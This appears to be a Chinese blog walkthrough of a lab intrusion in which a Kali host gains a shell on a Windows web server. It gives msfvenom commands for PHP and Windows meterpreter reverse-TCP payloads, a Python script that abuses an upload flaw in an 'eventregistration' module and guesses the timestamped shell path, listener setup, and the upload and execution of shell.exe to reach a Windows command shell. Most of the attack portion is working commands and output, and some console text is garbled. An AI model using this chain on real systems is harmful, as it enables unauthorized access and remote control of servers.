meterpreter php payload && windows payload 学习

Posted Erio

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了meterpreter php payload && windows payload 学习相关的知识,希望对你有一定的参考价值。

一 情景

本地kali linux 192.168.1.2

目标 windows NT 服务器192.168.1.4

目的是获取shell

二 过程

首先在linux建立终端

,msfconsole

建立php的payload,shell.php

 

root@simpleedu:~# rz

root@simpleedu:~# msfconsole
                                                  

msf > msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php
[*] exec: msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f raw > shell.php

No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 30092 bytes

 

通过脚本上传到服务器。这里python脚本在本地windows编写然后通过xshell rz 传到kali。   pxy同学提供

import requests
base_url=http://192.168.1.4/
url_for_time=index.php?module=eventregistration&action=eventsCalendar
url_for_upload=index.php?module=eventregistration&action=emailRegistrants&email_addresses=123456789@123.com&email_message=1&email_subject=1

files={attach:open(shell.php,rb)}

requests.post(base_url+url_for_upload,files=files)

print upload finish

r=requests.get(base_url+url_for_time)
html1=r.content
#print html1
index=r.content.find(History.pushState)
if index:
    time=html1[index:index+60].split(rel)[1].split()[1]
else:
    print something wrong
    exit(0)
print "get time:"+ time

for i in range(int(time),int(time)-20,-1):
    shell_url=base_url+tmp/+str(i)+_shell.php
    r2=requests.get(shell_url)
    if r2.status_code==200:
        print "shell is here : "+shell_url

 

然后在msfconsole中use multi/handle 开启监听 use php/meterpreter/reverse-tcp, set LHOST set LPORT exploit

 

msf > use multi/handler
msf exploit(handler) > set payload php/meterpreter_reverse_tcp
payload => php/meterpreter_reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.2:4444 

 

访问页面

然后看本地的终端已经建立了session

sessions查看已有session,sessions -i 1使用第一个session

利用该php的session可以做一些基础的操作比如pwd。。

但是不能使用windows的shell,这也是为什么接下来要做windows的payload

 

msf exploit(handler) > [*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:49203) at 2020-02-27 01:02:27 -0500

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:phpStudyWWW	mp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c

 

然后新建终端,msfconsole,新建windows payload,shell.exe。注意端口要和php的不重复

 

msf > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 -f exe -o shell.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe

 

然后用刚刚php的session upload 到服务器,

meterpreter > ls
Listing: C:phpStudyWWW	mp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c

meterpreter > upload shell.exe
[*] uploading  : shell.exe -> shell.exe
[*] uploaded   : shell.exe -> shell.exe
meterpreter > ls
Listing: C:phpStudyWWW	mp
============================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  30092  fil   2020-02-26 16:59:10 -0500  1582754354_shell.php
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  css
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  elfinder
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  extensionuploads
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  img_cache
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  minify
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  pixidou
40777/rwxrwxrwx   0      dir   2018-01-10 13:44:24 -0500  rsscache
100777/rwxrwxrwx  73802  fil   2020-02-26 17:02:33 -0500  shell.exe
40777/rwxrwxrwx   32768  dir   2018-01-10 13:44:24 -0500  views_c

 

此时在新建的终端use multi/handle 开启监听  use windows/meterpreter/reverse-tcp,set LHOST set LPORT  exploit

root@simpleedu:~# msfconsole
                                                  
 _                                                    _
/     /         __                         _   __  /_/ __
| |  / | _____               ___   _____ | | /   _    | | /| | | ___ |- -|   /    / __ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / - __    | |    | | \__/| |  | |_
      |/  |____/  ___/ / \___/   /     \__|    |_  ___

       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.2
LHOST => 192.168.1.2
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 192.168.1.2:443 

 

然后用php的session执行刚刚的windows的payload  execute -f shell.exe

meterpreter > execute shell.exe
[-] You must specify an executable file with -f
meterpreter > execute shell.exe -f
[-] You must specify an executable file with -f
meterpreter > execute  -f shell.exe 
Process 2640 created.

 

此时看新终端,检测到了session

然后类似于上面的php的操作步骤,可以使用这个session

同时可以使用 windows的 shell

 

msf exploit(handler) > [*] Sending stage (179267 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:443 -> 192.168.1.4:49204) at 2020-02-27 01:05:06 -0500

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 640 created.
Channel 1 created.
Microsoft Windows [°汾 6.3.9600]
(c) 2013 Microsoft Corporation¡£±£´???{¡£

C:phpStudyWWW	mp>cd C:
cd C:
C:phpStudyWWW	mp

C:phpStudyWWW	mp>cd^H^H^H
 ²»ˇ?²¿»??¿?®£¬?²»ˇ¿??е?? 
»??¦mτ¼þ¡£

C:phpStudyWWW	mp>c:
c:

 

三. 解决meterpreter 进入 windows的shell 中文乱码:

cmd 命令 chcp 65001

C:>type 2.key

type 2.key

¾??¡£

 

C:>chcp 65001

chcp 65001

Active code page: 65001

 

C:>type 2.key

type 2.key

Access is denied.

 

以上是关于meterpreter php payload && windows payload 学习的主要内容,如果未能解决你的问题,请参考以下文章

msf生成各个平台payload

msfvenom向apk注入payload

msf向存在漏洞的apk注入payload

20164305 徐广皓 Exp5 MSF基础应用

msf payload

kali payload程序制作